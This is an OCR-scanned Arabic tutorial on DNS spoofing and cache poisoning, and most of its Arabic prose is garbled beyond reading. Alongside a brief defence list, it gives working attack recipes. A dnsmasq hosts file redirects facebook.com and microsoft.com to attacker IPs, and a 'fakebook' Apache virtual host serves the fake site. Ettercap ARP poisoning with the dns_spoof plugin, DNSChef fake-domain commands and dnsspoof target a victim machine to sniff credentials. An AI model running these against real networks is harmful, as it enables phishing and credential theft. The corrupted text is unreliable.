(jj^J ^5^31 IP (jt jjc Jj l^L^jJ (j^-ftJ ^LkJl jl ^a^Jjaixi (j-a ^IxJjojVI ^n^J DNS <J^ ^ d£j-<Jl (jj^^jll Sj^li J dl!}L^jai AiLjaj jl 
^^Jfc Ajjoljj^)]! jUl 4w A\ t£)NS ^"^j^ oO^"^ ^aajoUJ J^tg-Il ^LS . Jij&aJI ^LdjJl Ai^ljalL (j^aLkJ! ^ixij^ll 

kij ^Iluj jllj i L^ajL&l l J J CjLa^Aj 4Ajit£3l CjUjIx^JI J&j <S J^^l ^1 £UJ^'j 6 ^J3-^ ^ 
^^LaC <J£ Jc- o JaJjuJl JU3Uj A^^)juJ Ij>1^q (jj^J DNS tj^^H^ L^^ 3 (J^-uiJ ^ g II (jUaJ £Jjoj jJ (j^J 

DNS Poisoning 

jj j^jII Ji^ij j^W^ f J c^j^^ fijiaiJI .DNS Poisoning Jj^- aIaxI^ s jJ^ JU ^j^j jVl 

1^ .DNS JJ (resolution request) jlS lij U J^xJI J (resolver cache) ^>JI 

uVl .DNS ^ Jj (resolution request) JL-jU Ju^JW jli (resolver cache) ^>J! Jp^^ J J^M 
DNS (JU- lili .authoritative DNS server ^ lil U Vj! o-^L? DNS ^ J 1 ^ 
cSUja jIS lij U Ai^>x-<i j aJ^JI dia^JI ja^ll ^3!^! oiiiii ^jj jjoj Jll JU1I *1 j^Vl u^(unauthoritative) 

ji jicji r ! a^jj ^ J^ 4^ jUJI DNS cjU^LJ Joliill ^^Ui^V! l^j u^ 1 .authoritative DNS ^ J^^j 

. JUJl J^ .com J Jj^I autherative utj^ root server ^ internet root server Jj J^-jj ^ 

.AjoujjjaII jl A£jJa3U ^j^aLiJl DNS ufi ^W-jj -COm JI J^-l L_llia jLuJjj 

11a .^Laajaj>JI/A£jj^l3 Autherative DNS Jj s-^ J^jj ^ ^-^>JW o- 3 ^ DNS J^ J ^ 

^jialjjclj Ajj^aljsll ^ Jkl Q\ (J^l ^ . DNSf^J Cache ^ (jVI ^JJ J^UJ^ j »1 n" S > al £A l^joij Aj^IslSI ^^UjjojVI 

^> jl^ufll Cjli DNS fSl* ^) .16 bit transaction ID u' J^W^ cjUjkx» jjj ^^UIujVI 

.aj jjjjII jSaj transaction ID '(^^ J DNS lS^j <> Jj>uJI (j^ksll BIND) BIND ci^^l 

transaction ID jk^' (4j ^ 'c>' 0 1 J ^ d^j^JI j dj^VI jl^V^ ^ DNS J u^j 

(a^^JI ^jUi^JI) DOS ^ e>±A Botnet Ajj^ljUl ^ i^Lujj t Jja^JI ^jjj ^^LkJI ajL^LojI ^.UajV .a^I jjujc Sjjj^j ^^IxjjujI 
Ai j^U^k o- 3 ^ DNS ^Sjll cr^s c?^'j ^ ^ cUUjII JjUj authoritative DNSf^ J*^ Jilj 

. jSl^JI ^aiLJ IP jljj^ ^ jSlj J^UI DNS ^ J! ^^Ui^VI JL-jj ^ transaction ID .transaction ID 

dii^ client resolver JJ j^-g-^ o^UJI Aia±kll IP jl jj^ ^U. jj t^LJ] jj j^jll s jSti J ajUJjujVI ^-^a jj 
^lq^JLuiaSI <— i jjuj J^^j .DNS J^ (--^j^l ^jj^^jll oj^li J a_^.jAa3I i_ u^aJI (jl jj»-!l Jc- Jj^^j l_a jjoj a^jjoJI 

J£joJI J jjjLiLaJl 11a jjj^j .(jjV^^^^I (jj<v^*iuirtll Jc ojLjall ^dl^Jl ^JJjJ j CliUi jlx-<Jl Aijjaj J^l^-U J J^^ J^W^ 
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:AJUJ) cj(jkaJ) ^jj) <DNS Poisoning f j^* 6^ 

4% c^i BIND (i^^^ JMj ls^j Jj^j ^ ^ o-flUJI jl^aJI DNS f ^ ' "uffi c3^^) treewalk 

^llx^ ^ Treewalk A IP ub^ J] README.TXT J SjjSUI c-iLJI ^ ( L> AiJ3l 

DNS 

.4? <>aUJI IP jl jjo ^ IP jl jj& Jl^l j DNS-spoofing.bat ^» 
.(chess.exe :^) ^.m:-> ^ j j]j DNS-spoofing.bat Trojanize 

(j^ajl > ^ J Kjmj^ 4 vs > (j^aLkSI DNS J^-^j (Jl^f^l 'Trojanned <— fil^ll Jc- c ajjja^H jib LqaIc 

.^l*Jb oAJA\ ji^JI Jl jVftaJI TCP/IP 

.cdJl c_fl jjoj l$j <j^aLaJl DNS ^W^ 3 J ^J M1 J> 4jauJal3 DNS f^-^ <— S 

c^ull tf S c>j .^>3I XSECURITY ^j- ^ eM XSECURITY - 

ui^Jt ^Uallt jljSil Jte l^lJilyil ^ JJIj DNS Poisoning cjUJ) <> 4juJ dU* 

Intranet DNS spoofing (local network) 
Internet DNS spoofing (remote network) 
Proxy server DNS poisoning 
DNS cache poisoning 
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Intranet DNS Spoofing 

.Intranet DNS Spoofing ^ J* ' (LAN)^A^ 4lkiJI aIiA Jc DNS Poisoning Utic 
switched LANj^ ^ *'j^j & ^ .A/fP Poisoning i> ^Lolaj Intranet DNS Spoofing *w u^M 
j^JI j\ jjj^II 4^j^> Jc- C-ij^aliU Jc fij^la (JjSj j aJ^JI <JL^j*VI a£jjui Jj ^L^Lg (Jj^j ^j) i 1 i>j ^ j^g^ ^ ^jVnl 

J^j Jj dii^k J^j jj jl jIaJI <jla tdul j±i\ DNS transaction ID <a < "i > ^Tfl l J ^W^l ^ 

. J*i!l DNS fiL. 

: JttJI JLnJl ^xujjJ) J ^aj^JI jjjII^JI uua intranet DNS spoofing ^2 



Router IP 10.0.0.254 




Real Website 
www.xs ecuritvxrjro 
IP: 200.0,0.45 



Rebecca 
IP: 10,0.0,3 




Attacker ptH&cms the f outer 
and redfrects DNS requests 
toJih machine 



/ www jtHc wfHv.com 



Attacks snrfh tfte 
credential and 
redirects Che request 
to real website 



DNi Response 



as* 




0 



Attacker runs 
arpspoof/dnsspoof 



Fake Website 



DNS ^WIL arpspoof/dnsspoof J^-^ ti^j^ j^j^ Vj ^jL ^l^JI jl JLjJI ^jll ^> ^jjai; 

^ill jj jl jit jl^a. jli i jjjI jit jl^A Jj DNS (Rebecca) J^*JI .^W*^ ^ c> 

^ jis jllj JjasJI j DNS ^UiJ lUjj ^VJI jli 'DNS f^ 1 ^ Ak. .^l^J! jl^ Jj DNS (O^ 

^ig^J! ^jli t^l^xJI Jl <jj£Lq j j*j Jl ^3 j-a (jl t-ajj .^ig-aJI AjLouI c>5 -a& j ciijjjjVI a£jjoi Jc <-jjj Jl lS^-^*-^ 

, Jji^Jl ^ ^<JI Jj ^^J^ '^ st J ^ JjUa^SI CjLg jlx-<Jl ^.l^xJl ^bjlujl ,L_flJ j>Jl £jj j>Jl Jl 4^^L<J| 




Internet DNS Spoofing 




H (J e ^ cp DNS f^^) remote DNS poisoning ^4 ^ jj*-* Internet DNS Spoofing 
(rouge DNS server) ^> DNS ^ ^t^j Jj ^ ^ ^ J^i c> J ^ J ^^-^ J ^ j J^ 

.(Static IP) J^/^ ip oljSe. 

.(Trojan)^l jja 3 i > ^ t ^Lui^j ^Ui .Caj JjVI ^ujJI ^Uaj Jj^aij Uik^ Internet DNS Spoofing ^ 
^jIj ^1 ,A-iauJa]| jj primary DNS ^VtA^j A\ ^JL ^MITM <■ a^ajidll J <J^j ^ ^'j^' j 



<J£ jj* D^lcj ^JJ 1 0 JU3Uj g all ^Uaj Jj JjAj <^a&J IP (jl JJC- ^ Aj^jJalU ^aLkJlDNS ^^^J IP(j^ \""^ j ^.l^ll 

: J^^^ Internet DNS Spoofing ^ JU3I jUJI ^ J\ jj 
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Internet DNS Spoofing, attacker infects Rebecca's machine with a Trojan and 
changes her DNS IP address to that of the attacker's 



MtiJt Is ih» IF 



Rebecca 

IIP: ICO 0-5} 



Rebecca's Browser 
conne-cts to 65 .0-0-2 



Fata* Wpbsitp 
IP: && O.O.J 









Attacker sniffe the 




credential and redirects The 
request to real website 







Real Website 

www. Ktfrc ur rty-COfn 
IP 2O0.D.O.45 



I DNS Re cue si do 
« 1*200,0.0.2 



Attacker infects Rebecca's 
computer by change her DNS If 
address to: 200 .ao.2 




Attpctcer runs DN5 Server in 
Russia [IP 2Q0 O.D J\ 



Proxy Server DNS Poisoning 



^ .^WA? aj^JI ^.^jjJ! ^iL Cjbl^l ^jL < Proxy Server DNS Poisoning ^ 

CjLg jlauall ^^ic Cl^Iill A i£ aJ (j I Cilia ^^^-aA jll ^1 g all £3 ^ 4_i^jJa3l L_liL jj .lisu ,6^lj^)ia <jL^a. (j-a S^cLaixi 

:Proxy Server DNS Poisoning f ^ J^- ^^t^ Jk&\ J±±±±& \ ^JS . ^jauJaM 




— '-^ d pnu. ■■■ Hsrviff f i.is >lu un frlc&e 1 urfunp, riflrci kj 



~~ FJy ua» ui'^.b- MYdf.fl bid <nkJ cam 



Rebecca 
(IP: 10,0,0,51 



All Rebecca s Web 
request* goes t htough 
Hacker's machine 




Aaacfcer infect Reinact j l 

computer by changing her IE 
Proxy address to: 200.0.D.2 




Real Website 

www.xaecuritv.com 
tIP: 200 0 0,45) 



Attacker's lake website miffs, 
the credential and redirects 
the request to the real website 



Hacker sends Rebecca's 
request to Fake website 




Attacker runs Proxy Server 
in Russia IP; 2 00 .0.0.2 



DNS Cache Poisonin 





*UjJ UjL ^jj .lj^>» l^ia. ^1 djlalkill ^UjojI Jj> > iu! (cache memory) ^>Ji 
DNS Resolver u 1 * ^^^11 .l^J IP ^jUc cjVU^Ij 



SjSli DNS fUa ^ 
(domain name) cjISLLjII 
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'Cache J ^ jj^ 1 f 3 g?^ uh> H ^ ^ • (DNS Cache) DNS^j^ * ^ 

. DNS^- ^jj ^£ t> L^k < J^Wj a^j^t ^ o-aUJI IP u^j^ Resolver 

.(DNS Cache) DNS ££>ll oo^ s J) ^VU^j <iL^j jl cjI *l j^U p jLj li^DNS Cache U>^l^ 

DNS RcSOlvcrC^ 'OA* ^Vim^l ( . lllaJ UiAic. Axj j IP q\ jjc ^I^JjuiaII A ilJaJ IP (jl (J.\n>>n ^i^-all 

J] A^r^W ajl*. jj *jj tg-MUj .^IkuSI JU^VI jl^j DNS ^>JI oj j^2ll S jSli J Sk.n^t cjVU^VI ja^Jj 



:DNS ^>Jt c^J^t ^ 




Query for DNS info 



DNS cache it ui*r 
upetatedwfth IP oi 
Fake wobsitt 




I ■ Nllr-.lvJlO 3 

fake WEb Lite 



Internal 
DN5 



Authoritative server 
for xsecytrty.com 



with IP of* fake 




Fake Website 



Atta c ker Rogue DNS 



DNS Spoofing With a Simple DNS Server Using Dnsmasq in Kali 

j^JJ 4il (j* Jc- .IP U^J^ C ' J] ^^-^^l s-Lgjoi! 4_a^.jJ (jj^>ia (jC- dujJjiU CjlaUaill s-LgjoiI ftjl^j (jC- AJjjjoiaII DNS 

.<j o-aUJ! IP jljj^ Ai V jl '"example.com" Jl^VI 

<L^)IaJ CjVI^^VI <— flJjJ (j£-<uJl C5^^J '^^^ ^^A^ DNS (J^ L>* W^^-jj C5^^ IP U^J^*^ cJ 1 JU^jVI S^^-^ u*^j 

liljlji^) ^-^-J Jj (J^^VI jJ 6^lc! ^JJ t fllia a ^Iaj J - gaJJ (J^*^^ (J*^ C5^^J ^ 

.(MITM) ia^jll J J^j ? ^l^l^U JL^ijI 



^3UJI J djUi j^JI (j-a ^j^xJ! du^klojl ^5 t^jjjjjaLJI ^j^UJI J L^a j> ;(Blocking sites) ^sIj-aJI c_i 

/^jA±jjA\ ^ji^W cijl^JI Ji<i) Cij jjjVI l$ t fllia^ J jj^a jll £±A DNS forgery/spoofing 

.^AaJLaaJ La Ullc. JUIUj toliiii Ia^ ^ t(c alla^Q DNS 

J^U. ^> JL^jV! J^ runviW o^Jl c> J^h jW IP ^ ^ l^j^ :(MITM) Jl^2l '"«nnll 
c> <4j u^m ^ j 'SSLsplit J mitmproxy <wireshark ^1 ^l^i^U i^l j Jl ^UL-VI 

SSL (e 1 ^ 'SMTP 'HTTP) jS t> uj^ 

HTTPS) 
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Dnsmasq DNS ^VUjI uLjj 

; JLLojjII <^l j J^ ^I^IojU (jj^^iJ JjiJiill ^Uaj Jc Alifij ^5 j Dnsmasq Jj^v Vjl 

#apt-get install dnsmasq-base 
Jl V ji c^ljla «;*lli£ jSj ^ lil DNS c^al lU*jj c^ia jjlj Dnsmasq 43-J^Vl J 

.apt-get j*VI ^!^L-U Jl£/jl^V J .Dnsmasq ^j^j 

Dnsmasq ^ 

Dnsmasq j ^ V tUialjjal . Jjijfiil ^ c-iLlI \JLj /etc/dnsmasq.conf J ^I^J u> f Dnsmasq 

jlajuaVl AiLjajj l flL&ll lifc J cs^ cA^' * 

no-dhcp-interface= 

server=8.8.8.8 

no-hosts 

addn-hosts=/etc/dnsmasq.hosts 

V lil gjiJI (ip 8.8.8.8 u'j^ J^j^ DNS ^l^i^V Dnsmasq ^ j ^ c> oj* 
j^l ./etc/hosts J g?^ 1 t> /etc/dnsmasq.hosts <J ^J^l DNS ^VU^I a^L^j ^UJ! ^ ^UVI ^ 

JliJI li^l ^ jjj^I c> c>J aLLouj 4jV ^DHCP <^l j ^ Vl Dnsmasq J jVl 

^ cJ^Jiii /etc/dnsmasq.hosts Jl Dnsmasq I ^ ^ ^hcV! <-«L J ^1 ^tacVI iaj^ 

192.168.1.99 www.facebook.com 

192.168.1.98 www.microsoft.com microsoft.com 

192.168.1.97 www. any. domain any.domain 

:JVl£ Dnsmasq J^i> ^ L*^lj 
(jia!jc.V a \\* *n s^lcl tVjl Aijjla J^jojIj .Dnsmasq cJ^*^ s^lcl jl Jj»jujj ol^cVl cjUL» ^Uijj 

—log-queries j (AjilaJI J V 4 (debug mode)£9^^l —no-daemon ^l^i^l J^aL jli 4 jUikVI 

jUJl J^al ^ jVl ^ (STDOUT 

#killall -9 dnsmasq 

#dnsmasq —no-daemon —log-queries 

SAiLaixJ! ^il <jjou31j 4juaUj ,<ln^JI ^! ^1 j! l_ j -0 ^^-^V ^ > nj I^I^jjojI (j^j DNS spoofing 
m jL\ ^Lk c^l c> c5^^ ^>J^ ^ ^ j ^v^W ^ o£ tij^^ ^^>s V gi^alftll jli 4HTTPS HTTP 

IP ^ ji^Ji 4"192.168.1.99" *^ jj> DNS J^jj "www.facebook.com" ^» ^\ jl£ lij 4^1 JHJ3 

'Apache ^ji^ ^ ^l^ia.U ^ ."www.facebook.com" J HTTP ^ ^ lJli^I i^J JA ^l^j 11a 

.^l^c-VI t ^ jiajoaVI AiU-bU tillij c ^jbVl ^1^1 t ^ virtual host ^I^c-Lj ^* 

<VirtualHost *:80> 
DocumentRoot "/srv/www/fakebook/public_html" 
ServerName www.facebook.com 

</VirtualHost> 

. Jj^xJ) Jj l ^jl . n fij /srv/www/fakebook/public_html 
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Dns Spoofing ±* £tiiM 



( jo ^la^ll <j ^£11 ciLIc t . La U jc^ .DNS Spoofing i— (j* ^ alia a ^1 jjl iiilL ^jj^l^xJI ^JL t aj£ c_ l&Llj ^ d±£ 

DNS ^ > Jl DNS ^1 jWs-l 5^ - 

.4ja.jU. ja. i_iAill DNS ^W^ 3 

. DNSSEC^ - 

_4_^jliJI ^^IxjjujVI l£1 j-^' ^ ^1 ^j^a>» iaio ^l^kioaVDNS Resolver ^1^1 

-C5 ^jUJI DNS ajI^JI jl^ o3j£j 

.f^ Wi .. mti tUj ji ajUS UJ t recursing DNS^^ 

. DNS Non-Existent Domain (NXDOMAINV^^ t> ^Jl - 

,t*L 4-^Lkll 4_iLkWl Sj^Vl 

■C**^ 1 a ^^-^j IDS " 
.(Static) £4* IP j ARP J f\m*\ " 
.SSH " 
.sniffing ( CjIj^I ^ 

^jjj* jaII ^^juo^jjill ^al j>» ^I^jjujI Lajta 

.< flxjJall Jallj 4J!jV flkiL 4> ^Lkl! DNS ^ - 



Network Spoofing Tools for Kali 



Spoofing Tool: Ettercap 

http : //ettercap . github . io/ettercap : j^-a^ll 
a^ja+a Marco Valleri (NaGA) j Alberto Ornaghi (ALoR) <L^1jj 1^ ^ sbl ^ Ettercap 

JJ^il cj! jjJI <> ^jaxII (>uiajjj CjVj^jjjjJI ^> ^lAxIl active and passive dissection j^j .^Uua^I s jjUI 

/ ajjJa^llj 

^^Jc Ij^lfl ^JjL^aJa 4 li^ (J^J (Ji ^J^-ftJ ,iajaj jll ^ C-l^-J ^JJ c _ 5 ic 4_jaiij ^jJa j (JJ^la (Jc ARP (J J^* ^J^. Aj! 

LdJ ^USII 

(Modify data connections) JL^jI 
-Ij^ 'SSH1 ^POP 'HTTP 'FTP cjVj^j^jjJI jjjJ! c^UK ^L^l - 
.^aujJl HTTPS *^ jj> SSL ^I^W-S j^B - 

t^jllj 'curses mode 'text mode s^^^ ^ jL Ettercap Ettercap sbt c^AiJ (j? K jajj 

.GTK ^l^i^U jll 
JS^j Ettercap J^iH 

Sniffing/Spoofing I Network Sniffers and select the Ettercap graphical 

I^JV! <^USa (Jjjla ^Ui j 4_ix»jjoj jll jll ettercap J^-^ 

#ettercap -G 

A^Uia (jjjJa (jc t*Uij <ax^j\\ a^IjII ^ ettercap J^-^l 

#ettercap -T 



< https://www.facebook.com/tibea2004 



670 



#ettercap -C 



4^UL JjjL jo cillij curses J ettercap J^-^ 
DNS spoofing attack *t 



c> IP u'j^ fc* DNS ^Lkll :ol)W uj^ .DNS Spoofing ftjSIl Ettercap ^^i^j 
<uJ ^Vll .HTTP jj^JI l£ ^ 492.168.2.22 IP ub^ J ^ ^ 192.168.2.1 

.192.168.2.21 c> IP u>j^ 

:DNS Spoofing i ftfto **»3M *l jtiM 31*31 ^ 

.ILLoj UaIxj Ia£ jjujjI! jll Ettercap lS^»-^ >^ u*^ ^ 
^ Unified sniffing W 1 * J- 1 ^ yr^J Sniff <ija j^ftj ^jSj cjIj^Vi <> 



File 



ettercap NG-0.7.4.2 

Options Help 



B ri dged sn rffing. . . ShiFt-hB 



Set pcap filter,. 



4_Ajta 4_La J^judjj ^^jll j / £ pistil CjI j^VI -laJ^JJ ^ HOStS C5 3 ] lS^"VI (J^J^ 3 Cf 0 ^ <J^a^Jl A^jJdll ^ jjijjJaxJl (J^^J r* 

.Scan for hosts Is-** 
.Hosts list 

Add to Target 1 jfcib ^ij (DNS ^) lU^ jW 192.168.2.1 . W-^ ^ ^ ^ 

.^13 ^ 192.168.2.22 j^j 



Start Targets Hosts View Mitm Filters Logging PLugins HeLp 



Host List m 



IP Address MAC Address 



Description 



192.16S.2.1 F + :EC:3S:EC:07:DC 
192 16S 2 20 74:E5:OB:19:S5:6a 



M68.2.22 OSiOO: 27:43:15:16 



Delete Host 



Add to Target 1 



Add to Tarqet 2 



d3.&3 known services 

Randomizing 255 hosts for scanning... 
Scanning the whoLe netmask for 255 hosts. 
3 hosts added to the hosts List. . 
Host 19 2.LOS.Z.1 added ToTARGETI 
Host 192.168.2.22 added to TARGET 2 



.Arp poisoning J#*A l>j ^j^Vl -^j^ J Mitm JUSjVL ARP Poisoning *±x 

.^l^ll MAC ul ^ujal l j DNS MAC <*j^ l>j 
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Start Targets Hosts View 



Filters Logging Plugins Melp 



Host List 

i 



Eelete Host 




ethl G0:16:76:3B:06;E4 



ip redirect... 
Port stealing... 
Dhcp spoofing,,. 



Add to Target 2 



m Stop mitm attack(s) 

SSL dissection needs a valid 'reuii_nj anu_ 

Privileges dropped to UID 65534 GID 65534... 



etter.conf file 



.Start Sniffing <jj* j*^ £ t>j lsj^ cjIj^Vi ^ s^jJI Start ci> jfcJW 



Targets Hosts View Mitm Filters Logging Plugins Help 



,I.H.IImIiI 
bp sniffing 

E£it 



Ctri+W 



Ctrl+E 



Ctd+X 



Delete 



Add 



Target 2 



192-16B.1-51 



Delete 



z 



Add 



GROUP 2 : 192 iee,l,51 00:16:17:73:20:43 
Starting Untfiedsniffing.^ 

Unified sniffin^pwas stopped, 
ARP poisoner deactivated- 
RE-ARPi ng the victims... 



^jjj ^il! /etc/ettercap/etter.dns jl /usr/share/ettercap/etter.dns ^ fj* - 

google.com A 192.168.2.21 
.*google.com A 192.168.2.21 
www.google.com PTR 192.168.2.21 

.^l^JI c_jjj3I ^UJ google.com ^ ^ 

Cy*j l£ jUI dj| j^VI -iajj^ ^ ja. Plugins <^ ^jUill JiLk f lilli j dns_spoof ^cAj^I ^UjJI Jj*i2j ^ j£j 
Vij . Vnl dns_spoof ^c-lu^ll ^jJI ^ I j*j j^j 'Manage the plugins j^&J 



ettercap N*3-0."7.4.2 

Start Targets Hosts View Mitm FiLters Logging PLugins HeLp 



Host List 



Plugins t< 



Me 



Version Info 



arp_cop 1.1 Report suspicious A.RP activity 

auto add 1.2 AutomaticaLLy add new victims in the target range 

chk_ poison 1.1 Check if the poisoning had success 

* dns_spciof 1.1 Sends spoofed dns repLies 

dos_attack 1 . O Run a d.o.s. a 1 1 ac k a ga i ns t an IP add re ss 



AHP p cisonin g victims: 

GROUP 1 : 192.168. Z.l F4:EC:38:EC:07:DC 

GROUP 2 : 192 168 2. 22 OS:OC: 27:43:1 5: IS 
Activating dns.spoof pLugin. .. 



J 



. jjjIiII aAj^I google.com t3 .ru ^ 
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^oLk J] AjauJall jj 6^lcj j>» V^j DNS Spoofing lsj^ 6 <^-^ J^-^ el) - * 



[PPlMGziUa FirefDK 



File Edt Via-/," HiitDT-," B«*ma'k= T>afar 



^ ^ T £) |^ £f | I*] httptfg*^, 



1 Mc_-tVL-rtcd T IcjGcttino Stated | Ld^est Headhnss w 



It works! 

This is the default web page for this server. 

The web server software is running but no content has been added, yet. 



.Stop mitm attack(s) i>j u? jUt ^ j^Vl <^IS iajj^ <> Mitm 'Spoofing <^ 

i 



Start Targets Hosts View 



Host List %z Plugins X 
Name 




arp_cop 
autoadd 
chk_poi son 



version in 
1.1 Re 

1-2 A.Ji 
1 . L CnecK i r 



Filters Logging Plugins Help 
Arp poisoning... 
Icmp redirect... 
Port stealing... 
Dnop spoofing... 



r dfJe poisoning nac 



i the target range 

g naa success 



jj^l cilli ^ iajoijl <LjiaJ cillij ^L£3l L^aj) clA^ 

■4^aj DNS J^jI jaty > JjU 

#ettercap -i ethO -T -q -P dns_spoof -M ARP /192. 168.2.1/ /192. 168.2.22/ 

Scanning for merged targets (2 hosts)... 

2 hosts added to the hosts list... 

ARP poisoning victims: 

GROUP 1 : 192.168.2.1 F4:EC:38:EC:07:DC 

GROUP 2 : 192.168.2.22 08:00:27:43: 15: 18Starting Unified sniffing... 
Activating dns_spoof plugin... 

dns_spoof: [safebrowsing-cache.google.com] spoofed to [192.168.2.21] 

i^Ull ^jLj <J^a ^ > ^i^l ^jJa jll ettercap sbV! dt jLaJt ^^-^ *j 

http://linux.die.net/man/8Zettercap 

JjjS Jaia ;^ail! £j^aj .^J^^J J^J*^ ^— ^ lij (J* lajudj) EttCFCcip ,>*ljVI J^-^^] J 

•Q 

ARP SPOOFING it 

.LLLuj UxAu jjujjII jll Ettercap J^*^ u^l ^ jSj 
^5 Unified sniffing ^ J^i^is Sniff c3j* j^-? j£j cjIj^VI 
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ettcrcap NG- 0.7.4. 2 

Options, Help 



Bridged sniffing... 


ShiFt-hB 


Set pcap filter,., 


P 



mm 




.Scan for hosts V* 
.Hosts list V* 

J^a j Add to Target 1 Jb* ^ i>j u' .U^^ ^J* ^ ^Vl 



Start Targets Hosts View Mitm FiLters Logging PLugins HeLp 



Host List m 



I P Address 



MAC Address 



Description 



192.168.2.1 F4:EC:3S:EC:07:DC 
192 16S 2 20 74:E5:OB:19:55:6a 



Delete Host 



Add to Target 1 



Add to Target 2 



£3.153 knov/n services 

Randomizing 255 hosts for scanning... 
Scanning the whole netmask for 255 hosts. 
3 hosts added to the hosts List. . 
Host 13 Z. LOS. 2. 1 added to TARGET! 
Host 192.168.2.22 added to TARGET 2 



.Arp poisoning J#*>\ ^ l>j ^j^Vl -^j^ ^ Vj^jaJI Mitm JISSjVL ARP Poisoning *±x ^ 

.^l^ll MAC u' (A <pujall j DNS MAC u' f ^ c>j 



zz 



Start Targets Hosts View 



Filters Logging Plugins Help 



Host List K 



Mitm 

Psp poisoning 



Delete Host 



Iclmp redirect... 
Port stealing.,. 
Dhcp spoofing,,. 



ethl ->■ 00:16:76:3B:06rE4 

>SL dissection needs a valid 
Privileges dropped to UID 65534 GID 65534... 



• Stop mitm attack(s) 

SSL dissection needs a valid ■ reui ■ LL'I I III I □ I I U UN iLI 



Add Co Target Z 



etter.conf file 



.Start Sniffing c3> j*^ £ l>j lsj^ cjIj^Vi Jajj^ ^ s^j^j^ll Start cij* ^ 




GROUP 2 : X 3 2 _ X © S . X . 5- X OO r 1 <5 : 3. T : : 2 -»3^ 

Starting l_J r~i Slnig ggj^g i-i i ffni-nrri ^ . 

LI till i t± cJ s n i ffi nc^ was stopped. 
y\RP poisoner deactivated. 
RE-ARPing the victi ms... 
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Spoofing Tool: DNSChef 



http ://thesprawl .or g/ proj ects/dnschef : 
t> ^ J\ ^AZj ^ill ^la-JI jl^JI J] u^j^l cjUIL ^Ljil <ul^U jSa, ^Ulj SDNS Proxy j* DNSChef 

.A-ia - Sail A£jjuj JJ^>* c^-^ *J^ L g clA^ 6 6j^l3l d^A £xa II L_flJjJa>Jl 

^ ^ ji^i ^ill tSljl^a. s jU^U ^ujall jl^J DNS ^ ^1 £^ Uij^ ^iali ^DNSChef f t^i^t <> J 

:DNSChef 

,tSljl^> s jt^^U /etc/resolv.conf * — Jjaxj ^^Aiil Jji^l ^Ikj ^ 
.Control Panel ^ Network Connections jW^t c> ^ ^} 'Windows ^ 
^Lk jIjcIj ARP Spoofing JS* ^v^»"l <-*\fl*fl < J jVl ^11 yi SjjSUI DNS J) J jSI *4pl l& ^ 

.cjVVI c> o^jI ^l^kl^V c_ia1> jjoj ( >Ja t^JUll ^j^ill i> j DNS ^LaJI *Uac]j 'rogue DHCP 
.192.168.2.22 t>IPjl> ^ j 492.168.2.21 t>IPjl> ^DNSChef 

:DNS Proxy ^! i- 
:DNSChef ^» ^ J ai j-Vl 0^ ^ .Proxy * DNSChef 



#dnschef 



#host -t A google.com 



.DNS (localhost) yr^ 1 ( ^l^kl^V ^!^U ^ < jl^aJl ^ ^ 
:^U3I j*Vl ^wWi <A £>dt c> google.com o^j^ fiUiu>VI ^jj Ci3£ lil 

.dnschef j*VI Jj Uij 



root{akali:-# dnschef 

version 0.1 



/ 



( 



I V 
l_L 



\ f 



/ _l 

_ I l_ 

. \ / _ \ _l 
I I _/ I 
l_l 



iphslixfathesprawl .org 



[*] DNS Chef started on interface: 127. G.O.I 
[*] Using the following narmese rve rs : 8.8.8.8 

[*] No parameters were specified. Running in full proxy mode 
[21:08:63] 127.0.0.1: proxying the response of type 'A' for google.com 



DNS^ '31^ ^ (j?* uUjoiVi CjUIUI jj ^Iloj <li .Proxy ^ J^s DNSChef ^ ^ 

. 8.8.8.8> 
(Faking Domain) uL>i 
:google.com J yA^ 1 ^ DNS ^UiJ 'google.com u^j^ 



msfadmiii&metaaploitable:^ host -t ANY google.com 

google. com has address 74-125.235.41 

google.com has address 74,125.2 35.32 

google.com has address 74-125.235.46 

google.com has address 74,125.235.36 

google.com has address 74 , 125 . 235. 39 

google.com has address 74 , 125 . 235. 4 0 

google.com has address 74 , 125 . 235. 35 

google i com has address 74.125,235,37 

rsrcr . e . r-ozn r. = :=■ addrf>=? 

^•L-ccle . ron-i r.^==- addr= = = "4. 12 5.225*23 
google.com ha_a address 74*125.335-24 
google.com name server na 2 * go o g le * com * 
googla.com name server ns 1 » google . com. 
google.com name server na2.gaogLfi.cam. 
googl e . c om name s e r ver ns 4 . go o g le - com . 

google.com haa HOA record nsl . google . com . diis-adniin . google . com. 15303 71 72 00 13 00 12 0 9 £00 300 
rna fa dmiii@met aapl o i table : ^ $ | 
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.DNS Chef J] /etc/resolv.conf .google.com o^j^^ DNS <^j2j ^ Uj&j 4 jVI 

.JLLgjjII J J^l ^>^l <C.UiaJ ^ jij ^aJ (j-aj 

#dnschef -fakeip=192.168.2.21 --fakedomains google.com -interface 192.168.2.21 -q 

.google.com u^j^ IP u'j^- t> JU3I j*VI ^l^ikloL ^jauJal l ^ jL jYI 

$host -t A google.com 

google.com has address 192.168.2.21 

; JVI gSLill ^ js DNSChef ^ lU^ l^I jW J U1 

"oot@kali:-# dnschef - -fakQip=192 . 168 .2 .21 --fakedomains google .com --interface 192.168.2.21 -q 
:*] DNS Chef started on interface; 192.168.2.21 
'*] Using the following nameservers : S.8.8.S 

'*] Cooking replies to point to 192.168.2.21 matching: google.com 

!21: 17:29] 192.168.2.22: cooking the response of type 'fl' for google, com to 192.168.2.21 

JU1I U J\ J^U d& j0.2 jl^-VI J\ ^ jsll J\ ^ 40.1 J uV» c> IPv6 J^f\ ^ V DNSChef 
. IPv6 J jj c^S lil ( https://thesprawl.Org/media/projects/dnschef-0.2. 1 .tar.gz ) 

.DNSChef j*VI Jl -6 jW^I <LL^ 4ip v 6 ? I^-V 
#dnschef.py -6 — fakeipv6 fe80::a00:27ff:felc:5122 —interface :: -q 

Spoofing Tool: dnsspoof 

DNS cjUaIJ A^U^a tSll ^jjj .arpspoof J J^ lU^j Dsniff ^lj^ <> j^ac ^ Dnsspoof 

^ .<jU!J ^5 jljj ^iUU lUjj DNS <(UDP) Jj£jhjjj Jc- DNS lU*j «11 JL^jVI <^ <Jc DNS 

6 DNS j* 4-^ ' 0 C5^ -DNS (J* ^ J ^ J -0 UJ"^ ' . C5"^J L j C5"^ J J ^ lC ' ^-^^^ f^^W a^jUjujVI 

L> ^ SYN/ACK ^jh V 4_i^ j IP jjjU^ <> :ui5 4^>. JL, J J^JI <> -d ^ 4CjU1]J UDP DNS 

.(IP JUjjI ±± U^l\ cy* ^Vl ^Jl V UDP 'TCP 

jj^aLJI DNS (*^^ <jL^1ujVI lS^S J jj^aaJI DNS <c.U^aj ^ j£i <JaLauj dnsspoof ^bVl 

